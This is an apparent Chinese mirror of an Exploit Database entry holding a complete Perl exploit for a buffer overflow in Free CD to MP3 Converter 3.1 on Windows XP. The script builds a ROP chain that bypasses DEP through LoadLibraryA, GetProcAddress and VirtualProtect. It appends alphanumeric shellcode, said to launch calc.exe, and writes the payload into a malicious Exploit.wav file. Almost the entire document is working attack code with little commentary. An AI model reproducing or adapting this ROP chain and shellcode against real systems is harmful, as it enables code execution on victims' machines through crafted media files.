Free CD to MP3 Converter 3.1 – Universal DEP Bypass

• Exploit Database
• 132 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-08-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17634/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80

  #!/usr/bin/perl # #[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit #[+]Date: 07\08\2011 #[+]Author: C4SS!0 G0M3S #[+]Version: 3.1 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # #Dep bypass method: #LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :) # #   print q{   Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com Blog net-fuzzer.blogspot.com }; sleep(2); #Endereco para LoadLibraryA 0x672CA660 ##################################ROP FOR LOAD "kernel32.dll"############################################# my $rop = pack('V',0x00418764); # POP ESI # RETN $rop .= pack('V',0x672CA660); # Address to LoadLibraryA $rop .= pack('V',0x00412d09); # POP EBP # RETN $rop .= pack('V',0x004AD39B); # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN// Endereço de retorno da funçao LoadLibraryA $rop .= pack('V',0x00472be9); # PUSHAD # POP EBX # RETN $rop .= "kernel32.dll\x00"; $rop .= "A" x 27; ##################################ROP END HERE###########################################################   #Endereço para GetProcAddress 0x672CA668 ##################################ROP FOR Function GetProcAddress######################################## $rop .= pack('V',0x0048004d);# POP EBP # RETN $rop .= "\x00\x00\x00\x00"; $rop .= pack('V',0x00409a7f);# POP EDI # RETN $rop .= pack('V',0x672CA668);# Endereço para GetProcAddress $rop .= pack('V',0x0042ad45);# PUSH ESP # POP ESI # RETN $rop .= pack('V',0x004a1b0e);# POP ESI # RETN $rop .= pack('V',0x004AD39B);# ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN// Endereço de retorno da funçao GetProcAddress $rop .= pack('V',0x00421953);# ADD EBP,EAX # RETN $rop .= pack('V',0x004c0634);# PUSHAD # RETN $rop .= "VirtualProtect\x00"; $rop .= "A" x 25; ##################################ROP END HERE###########################################################   #################################ROP FOR VirtualProtect################################################# $rop .= pack('V',0x0042c786);# XCHG EAX,ESI # RETN // Endereço da VirtualProtect $rop .= pack('V',0x004d2c70);# POP EBP # RETN $rop .= pack('V',0x0047E58B);# JMP ESP // Endereço de retorno da funçao VirtualProtect $rop .= pack('V',0x0046abf7);# POP EBX # RETN $rop .= pack('V',0x00000400);# O valor de dwSize $rop .= pack('V',0x00402bb4);# POP EDX # RETN $rop .= pack('V',0x00000040);# Valor de flNewProtect $rop .= pack('V',0x10002b9c);# POP ECX # RETN $rop .= pack('V',0x10007064);# Valor de lpflOldProtect $rop .= pack('V',0x00472be9);# PUSHAD # POP EBX # RETN #################################ROP END HERE########################################################### my $shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK". "D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO". "RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9". #Shellcode Alpha Numeric WinExec "Calc.exe" "GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ". #Baseaddress EAX. "2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN". "LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8". "WDN0SUK8WOMV4DNNTWPYWN27KA";   my $buf = "A" x 4112; $buf .= $rop; $buf .= "\x8B\xC4\x83\xC0\x20\xFF\xD0".("A" x 21).$shellcode; print "\t\t[+]Creating File Exploit.wav...\n"; sleep(1); open(f,">Exploit.wav") || die "[-]Error: $!\n"; print f $buf; close f; print "\t\t[+]File Exploit.wav Created Successfully.\n"; sleep(1);